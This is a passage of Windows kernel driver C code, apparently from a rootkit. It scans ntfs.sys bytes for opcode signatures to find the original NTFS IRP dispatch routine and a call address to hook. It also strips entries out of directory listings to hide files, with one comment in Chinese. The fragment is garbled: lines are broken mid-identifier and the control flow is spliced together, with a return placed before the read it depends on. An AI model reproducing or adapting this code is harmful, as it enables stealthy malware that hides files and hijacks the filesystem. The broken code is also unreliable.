(FileContent[i+2]==0x68))
{
OldIrpDispatchRoutine=*(DWORD*)(&FileContent[i+3]);
break;
}
}
ExFreePoolWithTag(FileContent,0);
if (OldIrpDispatchRoutine)
{
FileContent2=ExAllocatePoolWithTag(NonPagedPool,0x100,0);
if (!FileContent2)
return result;
RtlZeroMemory((PUCHAR)FileContent2,0x100);
NtfsCodestartAddress =
OldIrpDispatchRoutine - ImageBase;
byteOffset.LowPart = NtfsCodestartAddress;
byteOffset.HighPart= 0x0;
currentDirInfo->NextEntryOffset =0;
break;
}
else
{
//指针往后移动,考虑到是文件链表的形式
int iPos=((ULONG)currentDirInfo) -
(ULONG)((PFILE_BOTH_DIR_INFORMATION)buf);
int iLeft=(ULONG)*lpBufLenth - iPos -
currentDirInfo->NextEntryOffset;
RtlCopyMemory((PVOID)currentDirInfo,(PVOID)( (char*)currentDirInfo+curre
ntDirInfo->NextEntryOffset ),(ULONG)iLeft);
continue;
}
}
lastDirInfo = currentDirInfo;
currentDirInfo =
(PFILE_BOTH_DIR_INFORMATION)((char*)currentDirInfo+currentDirInfo->NextE
ntryOffset);
} while(!bLastOne);
return;
}
status =
ZwReadFile(hFile,NULL,NULL,NULL,&iosb,FileContent2,0x100,&byteOffset,NUL
L);
if (NT_SUCCESS(status))
{
i=0;
while (i<0x100)
{
if
((FileContent2[i]==0xFF)&&(FileContent2[i+1]==0x75)&&(FileContent2[i+2]=
=0xE4)&&(FileContent2[i+3]==0xE8))
{
CallHooK =
*(DWORD*)(&FileContent2[i+4]);
CallHooK+=8;
CallHooK+=i;
break;
}
i++;
}
ExFreePoolWithTag(FileContent2,0);
result = NtfsCodestartAddress+CallHooK;
ZwClose(hFile);
return result;
}
}
}
} |
